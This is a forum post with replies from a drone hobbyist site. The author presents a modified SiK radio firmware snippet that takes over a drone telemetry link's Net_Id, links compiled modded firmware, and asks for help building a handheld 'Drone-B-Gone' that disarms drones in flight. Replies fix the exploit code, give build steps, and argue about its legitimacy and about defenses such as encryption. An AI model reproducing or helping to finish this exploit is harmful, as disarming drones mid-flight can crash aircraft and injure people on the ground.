HopeRF-TRP 3DR MavLink Attack


Project Status;          Design

Project Progress;       [∎∎∎                       ]


Once the project is complete i will be publishing it here


My write-up on my Blog www.googlex.co.uk/blog...


Hello DiyDrone.com Community!


My name is Jack and i'm currently working on a project to do with an exploit recently discovered (Oct 2015) in the MavLink Protocol.

First off the Exploit;

The exploit is to do with the radio's method of authentication, They use the header 'Net_Id' to identify themselves to the other radio's during transmission of data.

Within the Sik-Firmware for the SiLabs Si1000 ISM Radio thier is a file named "radio.c" within this file thier is some code that pulls the devices 'Net_Id' and checks it against incoming data packets to check if they are ment for the radio that is recieving them.

This is the original code;


// decode the header
errcount = golay_decode(6, buf, gout);
if (gout[0] != netid[0] || gout[1] != netid[1]) {
// its not for our network ID
debug("netid %x %x\n",
(unsigned)gout[0],
(unsigned)gout[1]);
goto failed;
}

However some guy has been able to modify this code so that when the radio receives a data packet it reads it's 'Net_Id' and sets the 'Net_Id' of the radio that received the packet to the same as the one that was just received, then the radio is able
to issue a command to the drone that it has just stolen the 'Net_Id' from such as "CMD_DISARM" witch would intern disarm the drone mid-flight!

Here is the "Modified" Code;


// decode the header
errcount = golay_decode(6, buf, gout);
if (gout[0] != netid[0] || gout[1] != netid[1]) {
// its not for our network ID
/* Mod */
// Set our radio to use the captured packets
NetID param_set(PARAM_NETID, gout[0]))
// Save the value to flash
param_save();
// To read the new value we need to reboot. Rebooting
RSTSRC |= (1 << 4);
/* End of Mod*/
}

My problem(s) are as follows.

I Can't compile the modded firmware as all of my Linux computers refuse to install Mono-Develop :/
I would like to have this running on a standalone Hope-RF HM-TRP 433 chip that is connected to an arduino, The arduino would have a display that when a button is pressed the display shows something like LINE1 "Drone-B-Gone" LINE2 "Disarming all drones in the area!" and the arduino would use Serial.Send() to send the command to the Hope-RF chip that contains the packet "CMD_DISARM" that would disarm the quad in flight.
I have no way of flashing the Hope-RF HM-TRP chip! I read somewhere that an arduino Uno could be used however i have lost that link :(
I Have NO Arduino experience so i don't even know how i would start coding something like this


And now for my Questions!
1. Can i link several HopeRF HM-TRP Modules together?? What i mean by this is could i possibly have 434/868/915 Modules with the modded code all linked to together with the Tx and Rx pins and the same power source (DUH with different antennas) so that when the button is pressed no matter what telemetry band the drone is using it WILL cover it?
2. Can someone please send me in the right direction on how i can achieve what i have asked above with an arduino??

All help is greatly appreciated!

Links to prior Research

http://madhacker.org/how-to-hijack-a-drone-by-telemetry-and-prevent-it/

https://github.com/Dronecode/SiK

http://www.shellntel.com/blog/2015/9/25/drone-code-execution

http://rc-fpv.pl/viewtopic.php?t=8011

Obviously i am not doing this in malicious intent... ;)

Thanks a lot guys!!!

Peace out ~Jack

<-------------------------------- UPDATE-1 ----------------------------------->

Having Second thoughts on how i should do this,

I am pondering as to weather i should use an android tablet with the usb OTG wire.

This way (As Andre K pointed out) I would be showing more skills as i am a confident android developer so i could possibly make my own app that gives me a multitude of functions such as Follow me, Disable, Manual Control, RTH//RTL, Set new home and go their also i could do flight mode change. I think this would possibly help me demonstrate more skills?

What do you guys think? Start you response with UPDATE-1 ;)

~Jack

<------------------------------ UPDATE-1 END ------------------------------->

<-------------------------------- UPDATE-2 ----------------------------------->

Finally getting somewhere!

A HUGE Thanks to Marcin Krawczyk for recommending Fedora to me!

I Have finally got the HRM_TRP firmware package compiled :)

It is attached below, This is the Fw WITH the mod :)

LINK TO FW FILE  <-- Not the correct upload!

I pulled an all niter doing this :S

~Jack

===

SUB UPDATE!

I accidentally uploaded the wrong file, this is the full dst output file :)

LINK TO FW FILE

===

<------------------------------ UPDATE-2 END ------------------------------->


By Jack Rogers


© InkyHacker 2016


hm_trp.zip

Firmware.zip

You need to be a member of diydrones to add comments!

Join diydrones

Email me when people reply –

Replies

  • Dear Andre,

    Obviously this essay is only a small part of the project, I explain:

    I am trying to develop some method of authentication between GCS and UAV. In the study of the state of the art, I have described the current communication protocols and explained why they are insecure. I thought it was a good idea to make a demo of how easy it was to take control of a UAV.

    You are very wrong with my intentions, they are just the opposite of what you think.

    I hope to make it clear that my intentions are not malicious.

    Thanks for your answer.

  • If that's a "career" project , you should have higher standards that years old plagiarism.

    The thing is 2 years old at least, and the simple approach above will not even work for all setup options.

    moreover, simple disarm is not about preventing anything, more than malicious attempt to cause accident.

    http://madhacker.org/how-to-hijack-a-drone-by-telemetry-and-prevent...

    Luckily, bad ideas like publishing code above is history with Mavlink 2.0 & encryption.

  • Hi Jack,

    I'm working on my final career project, it's about communications and security between uav.

    I'm trying to develop an anti-drone system based on your idea. Demonstrating the insecurity of the mavlink 3dr link.

    I can appreciate that you have great knowledge. Could you please guide me a little?

    thanks in advance

  • Believe the code should change to :

    lsb = gout[0]    uint8_t 

    msb = gout[1]  uint8_t

    all parameters = uint32_t

    NetID param_set(PARAM_NETID, (gout[1] \<\< 8 ) | (gout[0] & 0xff)))

     or possibly              gout[0] | (((uint16_t)gout[1])\<\<span>8)

    (The back slashes should be removed from the code,  it should be "less than" x2)

     

  • Hi, the firmware worked for me for network id in the low range < 30 (haven't tested all) but not in the high range +- 327.

    The modified firmwares radio's light went solid, but not the normal radio, also the config util could not get parameters from the modified radio?

    Does anybody have a clue why this would happen?

  • Interesting project, but it's been done before.  It truly is trivial to muck around with other people's clear text transmissions.

    Publishing something like this could spur on some rapid/panic firmware development.

    The Si1000 is capable of doing 128 and 256-bit AES encryption.  Example source from SiLabs exists.  The problem is technical only in the respect that encryption was not the chosen path for firmware dev and it would take a lot of reworking to strip it back down to the point that the resources are available.

    The real limitation is that it would be illegal to encrypt the transmissions.  You can't transmit encrypted in the ham bands.  Since most people aren't legal in the first place, maybe that's not that big of a deal.

    Kali linux is pretty obviously what you should be using.  The 32-bit official VM works great for me in vmware on 64-bit Win7.  Just use "sudo apt-get install sdcc" and everything should work fine.  Only problem for me is one of the RFD targets throws an error or warning.  No problem for all the others.

    One interesting thing about these chip radios is that there's hundreds of settings to play around with.  Anyone with security in mind can simply change almost any of these in the firmware and be immune to the sort of attack you suggest.

    It would also be fairly trivial to implement an authentication scheme that would put this sort of attack just outside the capabilities of 99.9% of the would-be hackers out there.

    What would be kind of fun would be a simple "drone scanner" that would intercept and display the telemetry from any drones in the area.  That would actually be legal and far more fun than simply crashing people's gear for no reason.  With some good antennas, a couple 3DR radios, and a couple video receivers you could be getting flight data and video quite easily.  With more and more drones out there you might end up with multiple channels of drone video you can switch between. 

    • I LOVE The idea, "Drone Scanner!" I may work on this!

      Well see what happens in the near future, But i still haven't received my radios :/

      • There's probably a fair bit of work to do in order to get that working.

        Almost every setting changes everything, so having the netid doesn't nail down much.  The channels will still be completely different if you use other than default frequency ranges or different numbers of channels.  Most of the other settings shouldn't affect channel frequencies, but would probably prevent communication.

        As a ham, I should be able to receive data broadcast on ham frequencies without any untoward efforts.  So I'm kind of interested in how I can quickly lock onto FHSS signals.

        I'm thinking that if two channels can be determined then the netid, frequency range, and number of channels can probably be computed.

        • My thoughts exactly Jake!

          I'm still struggling with the compile environment for the radios, I have it almost up and running (some problem with the version of make.exe I'm running (doing it all under windows)

          Once I have enough spare time...

          • I tried to compile under windows.  It should work, but after an hour or so I gave up.

            Go to the Bactrack/Kali linux download page and find the VM image (I used 32-bit on 64-bit windows).

            Then just run: sudo apt-get install sdcc

            I ran the following to update everything first...

            sudo apt-get update # Fetches the list of available updates
            sudo apt-get upgrade # Strictly upgrades the current packages
            sudo apt-get dist-upgrade # Installs updates (new ones)
            apt-get autoremove # Removes junk

            sudo apt-get install sdcc

            make install~radio~hm_trp

            Worked like a charm for me.

This reply was deleted.

Activity

David Hori liked Isabella Domi's profile
Wednesday
gotham liked gotham's profile
Dec 3, 2020
More…